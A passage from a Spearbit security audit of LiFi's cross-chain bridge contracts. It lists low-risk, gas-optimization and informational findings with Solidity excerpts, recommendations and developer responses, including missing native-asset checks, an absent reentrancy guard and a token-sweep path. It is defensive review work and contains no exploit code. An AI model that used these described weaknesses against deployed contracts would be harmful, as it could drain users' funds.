_squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... } Recommendation: Consider checking enough native asset is sent for the fee. 13 Note: ArbitrumBridgeFacet has extra logic, which might be used elsewhere. LiFi: We know it. We make no token in the Diamond and tx will revert if there's no enough native asset. Spearbit: Acknowledged. +5.3.2 No check on native assets Severity: Low Risk Context: HopFacetOptimized.sol#L77-L92, GnosisBridgeL2Facet.sol#L39-L53, MultichainFacet.sol#L145-L166 Description: The functions startBridgeTokensViaHopL1Native() , startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use na- tive assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) LibAsset.depositAsset(_bridgeData.sendingAssetId,_bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); } Recommendation: Consider sufficient native asset is supplied. LiFi: We do this on purpose as no token should be in the contract. The transaction will revert if not enough tokens are there. So we don't need to check manually, and save gas. Spearbit: Acknowledged. +5.3.3 Missing doesNotContainDestinationCalls() Severity: Low Risk Context: LIFuelFacet.sol#L27-L42 Description: The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() doesn't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... } Recommendation: Consider adding doesNotContainDestinationCalls(). LiFi: Fixed in PR 273. Spearbit: Verified. 14 +5.3.4 Race condition in _startBridge of LIFuelFacet. Severity: Low Risk Context: LIFuelFacet.sol#L72-L101, PeripheryRegistryFacet.sol#L34-L41 Description: If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... ( ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; } Recommendation: Consider calling getPeripheryContract() instead of accessing the PeripheryRegistryMap- pings directly. In getPeripheryContract() consider reverting if the value is empty. LiFi: Keep this as it is. It will revert when it tries to call collectNativeGasFees or collectTokenGasFees Spearbit: Acknowledged +5.3.5 Sweep tokens from Hopfacets Severity: Low Risk Context: HopFacet.sol, HopFacetOptimized.sol Description: The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left at the Diamond, however, in this version there are small amounts left: Etherscan LiFiDiamond. Recommendation: Check _bridgeData.sendingAssetId==bridge.token(), in _startBridge, after bridge has been determined. LiFi: We get the bridge from the sendingAssetId, which means the bridge.token() is _bridgeData._sendingAs- setId. address sendingAssetId = _bridgeData.sendingAssetId; Storage storage s = getStorage(); IHopBridge bridge = s.bridges[sendingAssetId]; Also, we make no token in the Diamond, so I think we can leave it as now. Spearbit: Acknowledged. 15 +5.3.6 Missing emit in _swapAndCompleteBridgeTokens of Receiver Severity: Low Risk Context: Receiver.sol#L224-L297 Description: In function _swapAndCompleteBridgeTokens the catch of ERC20 tokens does an emit, while the comparable catch of native assets doesn't do an emit. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { .. try ... {} catch { receiver.call{ value: amount }(""); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } } Recommendation: Add an emit to the catch of native assets. LiFi: Fixed in PR 281. Spearbit: Verified. +5.3.7 Spam events in ServiceFeeCollector Severity: Low Risk Context: ServiceFeeCollector.sol#L44-L110 Description: The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ... emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ... emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS,receiver,feeAmount); } Recommendation: If spam events are relevant, consider adding authorization to the functions. LiFi: Acknowledged. Spearbit: Acknowledged. 16 +5.3.8 Function depositAsset() allows 0 amount of native assets Severity: Low Risk Context: LibAsset.sol#L107-L116 Description: The function depositAsset() disallows amount == 0 for ERC20, however it does allow amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } } Recommendation: Consider also checking amount == 0 for native assets. LiFi: Fixed in PR 279. Spearbit: Verified. +5.3.9 Inadequate expiration time check in ThorSwapFacet Severity: Low Risk Context: ThorSwapFacet.sol#L108 Description: According to Thorchain, the expiration time for certain operations should be set to +60 minutes. How- ever, there is currently no check in place to enforce this requirement. This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet. Recommendation: Consider adding a validation check within the ThorSwapFacet to ensure that expiration times are set to +60 minutes. LiFi: Fixed with PR 278. Spearbit: Verified. +5.3.10 Insufficient validation of bridgedTokenSymbol and sendingAssetId Severity: Low Risk Context: SquidFacet.sol#L146-L166 Description: During the code review, It has been noticed that the facet does not adequately check the corre- spondence between the bridgedTokenSymbol and sendingAssetId parameters. This oversight could allow for a random token to be sent to the Diamond, while still bridging another available token within the Diamond, even when no tokens should typically be left in the Diamond. Recommendation: Consider implementing validation mechanisms to ensure that the bridgedTokenSymbol and sendingAssetId correspond before executing any asset transfers. LiFi: Fixed with PR 282. Spearbit: Verified. 17 +5.3.11 Check for destinationChainId in CBridgeFacet Severity: Low Risk Context: CBridgeFacet.sol#L94-L128, Validatable.sol#L11-L22 Description: Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId) fit in an uint64 then the checks of modifier val- idateBridgeData are already sufficient. When _bridgeData.destinationChainId > type(uint64).max then this never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); Then in the rest of the code it takes the truncated varion of the destinationChainId via uint64(_bridge- Data.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData,CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(... , ,! uint64(_bridgeData.destinationChainId),...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ... } Recommendation: If there are situations where block.chainid and _bridgeData.destinationChainId) could be too large for uint64 then verify this. Remove the redundant check if (uint64(block.chainid) == _bridge- Data.destinationChainId). LiFi: Fixed with PR 275. Spearbit: Verified. +5.3.12 Absence of nonReentrant in HopFacetOptimized facet Severity: Low Risk Context: HopFacetOptimized.sol#L12, ERC20Proxy.sol Description: HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks are done on purpose to save gas. However, the most important check is the nonReentrant modifier. On several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 18 tokens, custom tokens, native tokens transfers. In combination with the complexity of the code and the power of ERC20Proxy.sol it is difficult to make sure no attacks can occur. Recommendation: Consider doing one of the following: • add nonReentrant to the functions of HopFacetOptimized.sol • seperate HopFacetOptimized.sol from the Diamond contracts; – to keep one address for settings allowances by the users consider using ERC20Proxy or permit2 of uniswap. To prevent stuck native assets consider removing the payable keyword from the following functions because they normally wouldn't receive native assets. Note: this does cost some extra gas. • swapAndStartBridgeTokensViaHopL1Native() • swapAndStartBridgeTokensViaHopL2Native() LiFi: Acknowledged. • We think it's still safe without nonReentrant modifier since we make no token in the Diamond • Keeping the payable keyword is useful in situations where the amount is partly paid in ERC20 tokens and partly in native tokens. Spearbit: Acknowledged. +5.3.13 Revert for excessive approvals Severity: Low Risk Context: HopFacetOptimized.sol#L42 Description: Certain tokens, such as UNI and COMP, undergo a reversal if the value input for approval or transfer surpasses uint96. Both aforementioned tokens possess unique logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these token so set to low risk. Recommendation: To address this issue, it is advised to implement a standardized validation mechanism for the approval processes. This mechanism should verify and restrict the input values to be within the allowable uint96 range, preventing revert occurrences. LiFi: Acknowledged. Spearbit: Acknowledged. +5.3.14 Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee Severity: Low Risk Context: DeBridgeFacet.sol#L124 Description: The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or getting stuck in the process. This issue can arise when the fee rate is not set correctly or there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience. Recommendation: To avoid this issue, it is recommended to include a validation step for the global fixed native fee rate in the transaction logic. This can be done by fetching the current fee rate from a debridge gate and comparing it with the fee rate used in the transaction. uint protocolFee = deBridgeGate.globalFixedNativeFee; 19 LiFi: Fixed with PR 253. Spearbit: Verified. +5.3.15 Incorrect value emitted Severity: Low Risk Context: LibSwap.sol#L76-L78 Description: LibSwap.swap() emits the following emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount as the observer won't know which of the two values has been emitted. Recommendation: Depending on the intended definition of toAmount, reconsider emitting one of the two values. LiFi: Acknowledged. Spearbit: Acknowledged. +5.3.16 Storage slots derived from hashes are prone to pre-image attacks Severity: Low Risk Context: AxelarFacet.sol#L17, HopFacet.sol#L19, MultichainFacet.sol#L24, OptimismBridgeFacet.sol#L26, Own- ershipFacet.sol#L16, ReentrancyGuard.sol#L10, LibAccess.sol#L12, LibAllowList.sol#L12, LibDiamond.sol#L12, LibMappings.sol#L12-L1 Description: Storage slots manually constructed using keccak hash of a string are prone to storage slot collision as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload. Recommendation: Subtract 1 from the keccak hash before assigning it to NAMESPACE: bytes32 internal constant STARGATE_NAMESPACE = bytes32(uint(keccak256("com.lifi.library.mappings.stargate")) - 1); LiFi: Acknowledged. Spearbit: Acknowledged. 20 +5.3.17 Incorrect arguments compared in SquidFacet Severity: Low Risk Context: SquidFacet.sol#L69 Description: startBridgeTokensViaSquid () reverts if (_squidData.sourceCalls.length > 0) != _bridge- Data.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to Squid Router, and _bridge- Data.hasSourceSwaps refers to source swaps done by SquidFacet. Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced) which means _squidData.sourceCalls.length has to be 0 for it to successfully execute. Recommendation: Remove this check. LiFi: Fixed in PR 258. Spearbit: Verified. +5.3.18 Unsafe casting of bridge amount from uint256 to uint128 Severity: Low Risk Context: MakerTeleportFacet.sol#L118 Description: The issue with the code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may result in a loss of precision or even an overflow. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) + ); Recommendation: To address this issue, it is recommended to use a SafeCast library that provides safe casting methods with appropriate checks to avoid any potential issues with loss of precision or overflows. The SafeCast library can be used to safely cast the uint256 value to uint128 before passing it to the initiateTeleport() function. LiFi: Fixed with PR 257. Spearbit: Verified. 21 5.4 Gas Optimization +5.4.1 Cache s.anyTokenAddresses[_bridgeData.sendingAssetId] Severity: Gas Optimization Context: MultichainFacet.sol#L203-L245 Description: The function _startBridge() of MultichainFacet contains the following expresssion. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ? ,! s.anyTokenAddresses[_bridgeData.sendingAssetId]: ... Recommendation: Consider storing s.anyTokenAddresses[_bridgeData.sendingAssetId] in tmp variable. LiFi: Fixed with PR 293. Spearbit: Verified. +5.4.2 DeBridgeFacet permit seems unusable Severity: Gas Optimization Context: DeBridgeFacet.sol#L119-L148 Description: The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this function doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... } Recommendation: Check the conclusion and consider removing _deBridgeData.permit. LiFi: Fixed with PR 291. Spearbit: Verified. +5.4.3 Redundant checks in CircleBridgeFacet Severity: Gas Optimization Context: CircleBridgeFacet.sol#L65-L87, Validatable.sol#L24-L39 Description: The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. 22 function swapAndStartBridgeTokensViaCircleBridge(...) ... { ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ... } modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; } Recommendation: Consider to remove noNativeAsset(). LiFi: Fixed with PR 255 & PR 294. Spearbit: Verified. +5.4.4 Redundant check on _swapData Severity: Gas Optimization Context: MakerTeleportFacet.sol#L89-L91 Description: This check is not present in the majority of the facets if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required as _depositAndSwap() reverts when length is 0. Recommendation: Consider removing this check to save gas. LiFi: Fixed in PR 276. Spearbit: Verified. +5.4.5 Duplicate checks done Severity: Gas Optimization Context: ArbitrumBridgeFacet.sol#L131, AmarokFacet.sol#L67 Description: In highlighted cases, a check has been done multiple times at different places: • validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() does checks already done by functions from which it's called. • depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok(). Recommendation: • Remove validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() function. • LibAsset.depositAsset() performs several checks already done in modifiers present in AmarokFacet. While it's unsafe to remove those checks from depositAsset() as it's used at different places, to save 23 gas you can create its "unsafe" version that removes those checks. You need to be careful in integrating that version. LiFi: • Removed validateBridgeData modifier PR 288. • We don't want to maintain multiple versions of depositAsset() method. Spearbit: Verified and acknowledged. +5.4.6 calldata can be used instead of memory Severity: Gas Optimization Context: LibAsset.sol#L120, AcrossFacet.sol#L78, CBridgeFacet.sol#L70, CBridgeFacet.sol#L96, CelerIM- Facet.sol#L116, CelerIMFacet.sol#L158, GravityFacet.sol#L90, HopFacet.sol#L149, MultichainFacet.sol#L205, SquidFacet.sol#L128, RelayerCelerIM.sol#L157-L15, ServiceFeeCollector.sol#L122 Description: When the incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements. Recommendation: Consider replacing memory with calldata for highlighted code above. Also, consider tracing those arguments through function calls to ensure it's not being copied to memory. LiFi: Fixed in PR 268. Spearbit: Verified. +5.4.7 Further gas optimizations for HopFacetOptimized Severity: Gas Optimization Context: HopFacetOptimized.sol#L15-L22, HopFacetOptimized.sol#L50-L72, ILiFi.sol#L7-L18, LibAsset.sol#L91- L105 Description: For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbritrum, it is relatively expensive due to the calldata. 24 struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ... { if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); } Recommendation: Consider shrinking the HopData and BridgeData. The transactionId might be enough to track the transfer. A signature from the API could be added to verify the authenticity and prevent spam. In that case, adding a nonce is useful to prevent replays. Some uint256 might be replaced by smaller types. Consider having a dedicated version of transferFromERC20() with fewer checks. Note this will increase some risks. Consider having a standalone version of the HopFacetOptimized bridge to remove any overhead from the Dia- mond and its proxy. In that case consider having a vanity address with leading 0s for HopFacetOptimized, see create2crunch. Consider having a very limited number of functions and make sure the most important functions have the lowest value for their signature. This will reduce some gas. Remove redundant event : HopFacetOptimized.sol#L26 Note: the _depositAndSwap() is complicated and gas intensive and could be optimized by a redesign. LiFi: Several optimizations applied in HopFacetPacked.sol via PR 283. Spearbit: Verified. 25 +5.4.8 payable keyword can be removed for some bridge functions Severity: Gas Optimization Context: CircleBridgeFacet.sol#L48, MakerTeleportFacet.sol#L59, GnosisBridgeFacet.sol#L43 Description: For the above highlighted functions, the native token is never forwarded to the underlying bridge. In these cases, payable keyword and related modifier refundExcessNative(payable(msg.sender)) can be re- moved to save gas. Recommendation: Remove payable keyword and refundExcessNative(payable(msg.sender)) modifier for the highlighted functions. LiFi: Fixed in PR 265. Spearbit: Verified. +5.4.9 AmarokData.callTo can be removed Severity: Gas Optimization Context: AmarokFacet.sol#L29, AmarokFacet.sol#L122-L124 Description: AmarokFacet's final receiver can be different from _bridgeData.receiver address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed as the final receiver. Recommendation: Remove callTo field from AmarokData struct, and apply this diff -address receiver = _bridgeData.hasDestinationCall - - ? _amarokData.callTo : _bridgeData.receiver; // initiate bridge transaction connextHandler.xcall{ value: _amarokData.relayerFee }( _amarokData.destChainDomainId, - + receiver, _bridgeData.receiver LiFi: Fixed in PR 263. Spearbit: Verified. +5.4.10 Use requiredEther variable instead of adding twice Severity: Gas Optimization Context: ArbitrumBridgeFacet.sol#L144-L178 Description: The cost and nativeAmount are added twice to calculate the requiredEther variable, which can lead to increased gas consumption. Recommendation: Use requiredEther variable in the _startNativeBridge function. 26 if (isNativeTransfer) { - + _startNativeBridge(_bridgeData, _arbitrumData, _cost); _startNativeBridge(_bridgeData, _arbitrumData, requiredEther); } else { _startTokenBridge(_bridgeData, _arbitrumData, _cost); } .... function _startNativeBridge( ILiFi.BridgeData memory _bridgeData, ArbitrumData calldata _arbitrumData, uint256 requiredEther ) private { - + inbox.unsafeCreateRetryableTicket{ value: _bridgeData.minAmount + cost value: requiredEther } LiFi: Fixed with PR 262. Spearbit: Verified. +5.4.11 refundExcessNative modifier can be gas-optimized Severity: Gas Optimization Context: SwapperV2.sol#L118-L126 Description: The highlighted code above can be gas-optimized by removing 1 if condition. Recommendation: Replace the highlighted code with if (finalBalance > initialBalance) { LibAsset.transferAsset( LibAsset.NATIVE_ASSETID, _refundReceiver, finalBalance - initialBalance ); } LiFi: Fixed in PR 260. Spearbit: Verified. +5.4.12 BridgeData.hasSourceSwaps can be removed Severity: Gas Optimization Context: ILiFi.sol#L16 Description: The field hasSourceSwaps can be removed from the struct BridgeData. _swapData is enough to identify if source swaps are needed. Recommendation: containsSourceSwaps and doesNotContainSourceSwaps modifiers. Delete the field BridgeData.hasSourceSwaps and all the resulting checks like LiFi: We need hasSourceSwaps in BridgeData for off-chain analysis. Spearbit: Acknowledged. 27 +5.4.13 Unnecessary validation argument for native token amount Severity: Gas Optimization Context: ServiceFeeCollector.sol#L56, ServiceFeeCollector.sol#L90 Description: Since both msg.value and feeAmount is controlled by the caller, you can remove feeAmount as an argument and assume msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra. Recommendation: Remove feeAmount as an argument for collectNativeInsuranceFees() and collectNa- tiveGasFees() -function collectNativeInsuranceFees(uint256 feeAmount, address receiver) +function collectNativeInsuranceFees(address receiver) external payable if (msg.value < feeAmount) revert NotEnoughNativeForFees(); uint256 remaining = msg.value - (feeAmount); // Prevent extra native token from being locked in the contract if (remaining > 0) { (bool success, ) = payable(msg.sender).call{ value: remaining }( "" ); if (!success) { revert TransferFailure(); } } emit InsuranceFeesCollected( LibAsset.NULL_ADDRESS, receiver, feeAmount msg.value ); { - - - - - - - - - - - - + } LiFi: Fixed in PR 259. Spearbit: Verified. 5.5 Informational +5.5.1 Restrict access for cBridge refunds Severity: Informational Context: WithdrawFacet.sol#L28-L56 Description: cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge specific it can do any calls for the Diamond contract. Restricting what that function can call would allow more secure automation of refunds. Recommendation: Add a dedicated refund function to the Diamond similar to RelayerCelerIM.sol#L443-L477. LiFi: PR 243. Spearbit: Verified. 28 +5.5.2 Stargate now supports multiple pools for the same token Severity: Informational Context: StargateFacet.sol#L25-L28 Description: The Stargate protocol now supports multiple pools for the same token on the same chain, each pool may be connected to one or many other chains. It is not possible to store a one-to-one token-to-pool mapping. Recommendation: Pass pools in callData to ensure support for all pools. LiFi: Fixed in PR 237. Spearbit: Verified. +5.5.3 Expose receiver in GenericSwapFacet facet Severity: Informational Context: GenericSwapFacet.sol#L60-L69 Description: Other than the bridge facets the swap facet does not emit the receiver of a transaction yet. Recommendation: Emit a new event containing that information. LiFi: Added in PR 236. Spearbit: Fix is verified with PR 236. +5.5.4 Track the destination chain on ServiceFeeCollector Severity: Informational Context: ServiceFeeCollector.sol#L44-L56 Description: ServiceFeeCollector collects gas fees to send to the destination chain. For example /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract. Recommendation: Consider adding the destination chain ID to the functions collectTokenGasFees() and col- lectNativeGasFees(). LiFi: Fixed in PR 289. Spearbit: Verified. 29 +5.5.5 Executor can reuse SwapperV2 functions Severity: Informational Context: Executor.sol#L32, SwapperV2.sol#L30-L34, Executor.sol#L241, SwapperV2.sol#L30 Description: Executor.sol's noLeftOvers and _fetchBalances() is copied from SwapperV2.sol. Recommendation: Consider reusing these functions from SwapperV2, perhaps by extracting these functions in LibSwap. LiFi: We will leave as is for now. Spearbit: Acknowledged. +5.5.6 Consider adding onERC1155Received Severity: Informational Context: Executor.sol#L270 Description: In addition to ERC721, NFTs can be created using ERC1155 standard. Since, the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added. Recommendation: Consider adding onERC1155Received function to Executor.sol using ERC1155Holder. You can also use ERC721Holder.sol to replace the current onERC721Received() function. LiFi: Fixed in PR 295. Spearbit: Verified. +5.5.7 SquidFacet uses a different string encoding library Severity: Informational Context: SquidFacet.sol#L157 Description: SquidFacet uses an OZ library to convert address to string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent. Recommendation: This issue is just to highlight this difference. Consider commenting about this difference, or changing the library. LiFi: Acknowledged. Spearbit: Acknowledged. +5.5.8 Assembly in StargateFacet can be replaced with Solidity Severity: Informational Context: StargateFacet.sol#L295-L313 Description: The function toBytes() contains assembly code that can also be replaced with solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. 30 function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address,0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20),xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; } Recommendation: Consider using abi.encodePacked(_address)). LiFi: Fixed with PR 290. Spearbit: Verified. +5.5.9 Doublecheck quoteLayerZeroFee() Severity: Informational Context: StargateFacet.sol#L168-L218 Description: The function quoteLayerZeroFee uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute ‘ router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ... , toBytes(msg.sender) ); } function _startBridge(...) ... router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... } Recommendation: Doublecheck using msg.sender in quoteLayerZeroFee() results in the right fee. LiFi: Fixed with PR 292. Spearbit: Verified. +5.5.10 Missing modifier refundExcessNative() Severity: Informational Context: GnosisBridgeFacet.sol#L59-L83, GnosisBridgeL2Facet.sol#L58-L82 Description: The function swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet() and Gnosis- BridgeL2Facet() don't have the modifier refundExcessNative(). While other Facets have such a modifier. Recommendation: Doublecheck if the modifier refundExcessNative() has to be added. LiFi: Fixed with PR 280. Spearbit: Verified. 31 +5.5.11 Special case for cfUSDC tokens in CelerIMFacet Severity: Informational Context: CelerIMFacet.sol#L63-L149 Description: The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't have this. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ... } function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... } Recommendation: Doublecheck if swapAndStartBridgeTokensViaCelerIM() also should have a special case for cfUSDC tokens. LiFi: Fixed with PR 254. Spearbit: Verified. +5.5.12 External calls of SquidFacet Severity: Informational Context: SquidFacet.sol#L126-L175 Description: The functions CallBridge and CallBridgeCall do random external calls. This is done via a sepa- rate contract multicall SquidMulticall. This might be used to try reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ... } Recommendation: This adds to the case to have nonReentrant modifiers. LiFi: Acknowledged. Spearbit: Acknowledged. 32 +5.5.13 Missing test coverage for triggerRefund Function Severity: Informational Context: RelayerCelerIM.sol#L449 Description: The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation. Recommendation: Add the new test cases to the existing test suite and run the tests to confirm that the trig- gerRefund function operates as expected. LiFi: Fixed with PR 296. Spearbit: Verified. +5.5.14 Implicit assumption in MakerTeleportFacet Severity: Informational Context: MakerTeleportFacet.sol#L108-L122 Description: The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai),...); ... } Recommendation: Enforce dai !=0 or at least add a comment. LiFi: Acknowledged, MakerTeleportFacet is used to bridge Dai(0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1) from Optimism and Arbitrum to mainnet. Spearbit: Acknowledged +5.5.15 Robust allowance handling in maxApproveERC20() Severity: Informational Context: LibAsset.sol#L52-L67 Description: Some tokens, like USDT, require setting the approval to 0 before setting it to another value. The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily maxApproveERC20() sets the allowance so high that in practice this never has to be increased. function maxApproveERC20(...) ... { ... uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); } Recommendation: Consider setting the allowance first to 0 in maxApproveERC20(). LiFi: Fixed with PR 286. Spearbit: Verified. 33 +5.5.16 Unused re-entrancy guard Severity: Informational Context: RelayerCelerIM.sol#L21 Description: The RelayerCelerIM.sol#L21 includes a redundant re-entrancy guard, which adds an extra layer of protection against re-entrancy attacks. While re-entrancy guards are crucial for securing contracts, this particular guard is not used. Recommendation: Consider reviewing the contract and delete re-entrancy guard if it's not needed. LiFi: Fixed with PR 272. Spearbit: Verified. +5.5.17 Redundant duplicate import in the LIFuelFacet Severity: Informational Context: LIFuelFacet.sol#L13 Description: The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and 